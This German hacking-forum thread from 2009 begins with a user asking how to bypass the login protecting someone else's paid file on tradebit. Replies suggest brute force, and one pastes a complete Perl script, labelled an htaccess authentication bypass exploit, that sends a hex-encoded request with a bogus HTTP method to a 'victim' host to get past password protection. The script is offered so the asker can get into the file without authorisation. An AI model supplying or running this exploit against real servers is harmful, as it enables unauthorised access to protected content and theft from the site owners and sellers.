Ergebnis 1 bis 4 von 4
  1. 10.07.2009, 14:06 #1
    nilslissy
    nilslissy ist offline
    Fortgeschrittener
    Registriert seit
    23.06.2007
    Beiträge
    30

    Reden Wer kann Helfen ?

    Tag,


    Es geht um den Folgenden Link :

    /wwwroot/tradebit/tradebit.com/usr/blackman1970/prv/5001/auction.rar


    Ich will die datei auction.rar Downloaden.
    Aber man wird nach Log und Pw Gefragt.

    Frage:Kann man dies Umgehen ?

    MfG,
    Zitieren Zitieren
  2. 10.07.2009, 16:19 #2
    Kolabi
    Kolabi ist offline
    NoClose Wurm Avatar von Kolabi
    Registriert seit
    13.07.2007
    Beiträge
    198

    Standard

    Naja,
    da kann man nur mit Bruteforce einige Jahrzehnte ausprobieren.
    Zitieren Zitieren
  3. 10.07.2009, 16:26 #3
    Fox-Jet
    Fox-Jet ist offline
    W32.Lovgate Avatar von Fox-Jet
    Registriert seit
    14.11.2008
    Beiträge
    374

    Standard

    Um dir keine Blöde antwort zu geben, sag ichs mal so,

    Es ist möglich es zu umgehen, du brauchst abber viel zeit einen guten rechner und eine gute I-Net Leitung
    Mfg Fox-Jet


    Great Whitelist


    Alternativ Seiten für File Fetching
    Zitieren Zitieren
  4. 10.07.2009, 16:26 #4
    IRET
    IRET ist offline
    Transpinguin Avatar von IRET
    Registriert seit
    02.09.2008
    Beiträge
    1.295

    Standard

    Wahrscheinlich eine .htaccess
    EBFE hat vor kurzem ein htaccess Exploit gepostet.
    Ich nehme mir mal die Freiheit es hier rein zu kopieren
    Code:
    use IO::Socket;
use strict;
use warnings;

# __________________________________________________
#
#  ------------------------------------------------
# | htaccess request authentication bypass exploit |
#  ------------------------------------------------
#
#     written by katharsis - www.katharsis.x2.to
#
# __________________________________________________


<<i;
 
 
           (                      )
           |\    _,--------._    / |
           | `.,'            `. /  |
           `  '              ,-'   '
            \/              (     /
            ,-.        ,-.   `__,'
            |  \)    ,'   ) ,'.` |
            `.#/)   '.#_,'   ) ))|
            /  (_.)\     .   -'//
           (  /\____/\    ) )`'\
            \ |V----V||  ' ,    \
             |`- -- -'   ,'   \  \      _____
      ___    |         .'    \ \  `._,-'     `-
         `.__,`---^---'       \ ` -'
            -.______  \ . /  ______,-
                    `.     ,'     
  

  The devil is and always has been a gentleman.

i


my $host    = shift;
my $file    = shift;

print "\n[ htaccess request authentication bypass exploit ]\n";

if (!$file) 
{
  print "\n usage    htxploit.pl [host] [directory / file]";
  print "\n example  htxploit.pl www.victim.com /forums/\n\n";
  exit;
}

my $socket = new IO::Socket::INET (
             PeerAddr  => $host,
             PeerPort  => '80',
             Proto     => 'tcp',
             );

my $packet  =

"\x4D\x58\x48\x5A\x4D\x58\x20".$file.
"\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\n".
"\x48\x6F\x73\x74\x3A\x20".$host."\n\n\n";

print $socket $packet;

while(<$socket>)
{
  print;
}
close($socket);
    Zitieren Zitieren
« Vorheriges Thema | Nächstes Thema »

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  

Foren-Regeln